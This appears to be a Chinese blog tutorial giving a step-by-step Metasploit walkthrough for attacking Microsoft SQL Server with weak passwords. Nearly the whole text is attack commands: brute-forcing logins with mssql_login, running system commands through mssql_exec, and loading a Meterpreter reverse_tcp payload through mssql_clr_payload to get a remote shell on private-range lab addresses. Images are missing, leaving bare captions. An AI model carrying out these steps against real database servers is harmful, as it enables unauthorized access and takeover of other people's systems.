Mssql弱命令提权

1、进入msf

msfconsole

进入msf

2、搜索爆破模块

search mssql_login

搜索爆破模块

3、使用爆破模块,并查看参数

use 0  或 use auxiliary/scanner/mssql/mssql_login

show options

使用模块并查看参数

4、设置参数,并执行

设置参数

5、搜索执行命令模块

search mssql_exec

搜索执行命令模块

6、使用模块并查看参数

use 0 或 use auxiliary/admin/mssql/mssql_exec

show options

使用模块并查看参数

7、设置参数,并执行

set rhosts 192.168.80.181

set password 1234567

set cmd cmd.exe /c "whoami"

设置参数并执行

8、搜索模块

search mssql_clr

搜索模块

9、使用模块并查看参数

use 0 或 use exploit/windows/mssql/mssql_clr_payload

show options

使用模块并查看参数

10、设置参数,并执行

set rhosts 192.168.10.181

set password 1234567

set payload windows/x64/meterpreter/reverse_tcp

run

设置参数并执行

11、执行相关命令

相关命令
相关命令
最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容